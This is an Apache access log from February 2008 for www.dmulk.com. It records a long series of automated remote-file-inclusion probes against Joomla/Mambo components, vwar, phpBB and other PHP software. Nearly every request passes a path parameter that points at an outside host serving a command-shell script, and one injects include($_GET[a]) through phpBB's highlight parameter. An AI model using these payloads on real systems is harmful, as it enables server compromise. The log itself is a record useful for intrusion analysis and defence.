89.111.176.90 - - [14/Feb/2008:13:15:17 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sarion.info/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [14/Feb/2008:13:15:17 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sarion.info/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:13:17:07 -0800] "GET /administrator/components/com_comprofiler/admin.comprofiler.controller.php?mosConfig_absolute_path=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:13:17:07 -0800] "GET /logs/administrator/components/com_comprofiler/admin.comprofiler.controller.php?mosConfig_absolute_path=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:13:17:27 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:13:17:27 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:13:17:28 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:13:19:15 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:13:19:21 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:13:19:27 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.10.135.176 - - [14/Feb/2008:13:20:13 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.10.135.176 - - [14/Feb/2008:13:20:13 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
217.197.68.66 - - [14/Feb/2008:13:20:26 -0800] "GET /logs/access_071228.log/admin.php?include_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [14/Feb/2008:13:20:26 -0800] "GET /admin.php?include_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [14/Feb/2008:13:20:26 -0800] "GET /logs/admin.php?include_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.98.61 - - [14/Feb/2008:13:22:06 -0800] "GET /logs/access_071230.log//includes/settings.inc.php?include_path=http://www.oneshotmarines.com/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.98.61 - - [14/Feb/2008:13:22:06 -0800] "GET //includes/settings.inc.php?include_path=http://www.oneshotmarines.com/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.98.61 - - [14/Feb/2008:13:22:06 -0800] "GET /logs//includes/settings.inc.php?include_path=http://www.oneshotmarines.com/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [14/Feb/2008:13:22:45 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.15.138 - - [14/Feb/2008:13:23:16 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
67.19.15.138 - - [14/Feb/2008:13:23:16 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
193.69.144.194 - - [14/Feb/2008:13:23:18 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.69.144.194 - - [14/Feb/2008:13:23:19 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.69.144.194 - - [14/Feb/2008:13:23:19 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.191.28.10 - - [14/Feb/2008:13:27:00 -0800] "GET /logs/vwar/warteam.php?vwar_root=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
85.17.168.133 - - [14/Feb/2008:13:27:10 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.specialistec.com/doceboCms/a?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:13:27:30 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:13:27:31 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:13:27:31 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:13:28:04 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:13:28:05 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:13:28:05 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.69.144.194 - - [14/Feb/2008:13:28:19 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.68.66 - - [14/Feb/2008:13:28:34 -0800] "GET /logs/access_080106.log/admin.php?include_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:13:29:29 -0800] "GET /logs/access.log/index.php?table=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.9.228.166 - - [14/Feb/2008:13:29:44 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Pagebull http://www.pagebull.com/" "www.dmulk.com"
209.9.228.167 - - [14/Feb/2008:13:29:44 -0800] "GET /logs/access_070806.log HTTP/1.1" 200 23344 "-" "Pagebull http://www.pagebull.com/" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:13:29:52 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.112.140.125 - - [14/Feb/2008:13:30:36 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.112.140.125 - - [14/Feb/2008:13:30:36 -0800] "GET /logs/access_080130.log/errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.112.140.125 - - [14/Feb/2008:13:30:36 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.112.140.125 - - [14/Feb/2008:13:30:37 -0800] "GET /errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.112.140.125 - - [14/Feb/2008:13:30:37 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.112.140.125 - - [14/Feb/2008:13:30:38 -0800] "GET /logs/errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.112.140.125 - - [14/Feb/2008:13:30:46 -0800] "GET /logs/access_080131.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.112.140.125 - - [14/Feb/2008:13:30:47 -0800] "GET /logs/access_080131.log/errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
38.96.148.200 - - [14/Feb/2008:13:31:43 -0800] "GET /logs/access_071230.log/index.php?option=com_wmtgallery&task=cat_view&gid=&mosConfig_absolute_path=http://cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.96.148.200 - - [14/Feb/2008:13:31:43 -0800] "GET /index.php?option=com_wmtgallery&task=cat_view&gid=&mosConfig_absolute_path=http://cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.96.148.200 - - [14/Feb/2008:13:31:44 -0800] "GET /logs/index.php?option=com_wmtgallery&task=cat_view&gid=&mosConfig_absolute_path=http://cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.111 - - [14/Feb/2008:13:32:46 -0800] "GET /logs/access_071230.log/index.php?option=com_wmtgallery&task=cat_view&gid=&mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.dmulk.com"
81.177.16.111 - - [14/Feb/2008:13:32:46 -0800] "GET /index.php?option=com_wmtgallery&task=cat_view&gid=&mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.dmulk.com"
81.177.16.111 - - [14/Feb/2008:13:32:47 -0800] "GET /logs/index.php?option=com_wmtgallery&task=cat_view&gid=&mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.dmulk.com"
87.230.11.181 - - [14/Feb/2008:13:32:50 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.9.228.163 - - [14/Feb/2008:13:32:52 -0800] "GET /logs/access_070806.log HTTP/1.1" 200 23344 "-" "Pagebull http://www.pagebull.com/" "www.dmulk.com"
38.96.148.200 - - [14/Feb/2008:13:32:55 -0800] "GET /index.php?option=com_wmtgallery&task=cat_view&gid=&mosConfig_absolute_path=http://cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.117.225.155 - - [14/Feb/2008:13:33:26 -0800] "GET //bemarket/postscript/postscript.php?p_mode=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.9.228.167 - - [14/Feb/2008:13:33:33 -0800] "GET /logs/access_070806.log HTTP/1.1" 200 23344 "-" "Pagebull http://www.pagebull.com/" "www.dmulk.com"
65.38.105.213 - - [14/Feb/2008:13:34:26 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.fraiserandmain.com/adguest/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:13:34:30 -0800] "GET /logs/access_071219.log//classes/adodbt/sql.php?classes_dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
38.96.148.200 - - [14/Feb/2008:13:35:04 -0800] "GET /logs/access.log/index.php?option=com_wmtgallery&task=cat_view&gid=&mosConfig_absolute_path=http://cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.111 - - [14/Feb/2008:13:35:55 -0800] "GET /index.php?option=com_wmtgallery&task=cat_view&gid=&mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:13:36:25 -0800] "GET /logs/access.log//?p=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:13:36:25 -0800] "GET //?p=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:13:36:25 -0800] "GET /logs//?p=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 200 35262 "-" "libwww-perl/5.79" "www.dmulk.com"
82.146.33.210 - - [14/Feb/2008:13:37:13 -0800] "GET /logs/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
82.146.33.210 - - [14/Feb/2008:13:37:13 -0800] "GET /index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
205.234.222.47 - - [14/Feb/2008:13:37:34 -0800] "GET /index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
205.234.222.47 - - [14/Feb/2008:13:37:37 -0800] "GET /logs/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
81.177.16.111 - - [14/Feb/2008:13:38:07 -0800] "GET /logs/access.log/index.php?option=com_wmtgallery&task=cat_view&gid=&mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.dmulk.com"
80.38.62.39 - - [14/Feb/2008:13:38:17 -0800] "GET /inc/functions.inc.php?config[ppa_root_path]=http://www.laspeores.com.ar/lp//modules/Skins/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.38.62.39 - - [14/Feb/2008:13:38:17 -0800] "GET /logs/inc/functions.inc.php?config[ppa_root_path]=http://www.laspeores.com.ar/lp//modules/Skins/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:13:38:20 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:13:38:20 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:13:38:21 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:13:38:33 -0800] "GET /logs/access.log//?p=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:13:38:34 -0800] "GET //?p=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:13:38:34 -0800] "GET /logs//?p=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 200 34548 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:13:38:35 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.184.150 - - [14/Feb/2008:13:39:25 -0800] "GET /logs/access_080108.log//tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [14/Feb/2008:13:39:26 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.11.181 - - [14/Feb/2008:13:39:46 -0800] "GET /index.php?option=com_juga&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.17.168.133 - - [14/Feb/2008:13:41:00 -0800] "GET /logs/access_080122.log/modules/Neos_Chronos/header.php?base_folder=http://www.specialistec.com/doceboCms/a?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.168.133 - - [14/Feb/2008:13:41:00 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.specialistec.com/doceboCms/a?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.11.181 - - [14/Feb/2008:13:41:00 -0800] "GET /logs/access_080120.log/index.php?option=com_juga&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [14/Feb/2008:13:41:01 -0800] "GET /logs/index.php?option=com_juga&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.17.168.133 - - [14/Feb/2008:13:41:02 -0800] "GET /logs/access_080103.log/modules/Neos_Chronos/header.php?base_folder=http://www.specialistec.com/doceboCms/a?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.11.181 - - [14/Feb/2008:13:41:06 -0800] "GET /logs/access_080101.log/index.php?option=com_juga&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.17.209.50 - - [14/Feb/2008:13:42:28 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.141 - - [14/Feb/2008:13:44:34 -0800] "GET /minamijewelry/?N=D HTTP/1.0" 200 2100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.216.205.192 - - [14/Feb/2008:13:44:58 -0800] "GET /logs/access_071219.log//classes/adodbt/sql.php?classes_dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.11.181 - - [14/Feb/2008:13:45:15 -0800] "GET /logs/access_080118.log/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [14/Feb/2008:13:45:16 -0800] "GET /index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [14/Feb/2008:13:45:16 -0800] "GET /logs/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.9.37.130 - - [14/Feb/2008:13:45:53 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.hackergroup.altervista.org/cmd??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.9.37.130 - - [14/Feb/2008:13:45:54 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.hackergroup.altervista.org/cmd??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.9.37.130 - - [14/Feb/2008:13:45:54 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.hackergroup.altervista.org/cmd??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.159.64.21 - - [14/Feb/2008:13:46:41 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.hackergroup.altervista.org/cmd??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.159.64.21 - - [14/Feb/2008:13:46:41 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.hackergroup.altervista.org/cmd??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.141 - - [14/Feb/2008:13:48:14 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.159.64.21 - - [14/Feb/2008:13:48:18 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.hackergroup.altervista.org/cmd??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.159.64.21 - - [14/Feb/2008:13:48:19 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.hackergroup.altervista.org/cmd??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.135.132 - - [14/Feb/2008:13:48:40 -0800] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [14/Feb/2008:13:48:41 -0800] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [14/Feb/2008:13:48:41 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bastard0.interfree.it/mia/bao/asd/lol/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [14/Feb/2008:13:48:48 -0800] "GET /logs/access_071216.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [14/Feb/2008:13:48:49 -0800] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [14/Feb/2008:13:48:49 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [14/Feb/2008:13:48:51 -0800] "GET /logs/access_071228.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.9.37.130 - - [14/Feb/2008:13:49:00 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.hackergroup.altervista.org/cmd??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:13:49:28 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:13:49:29 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [14/Feb/2008:13:49:50 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
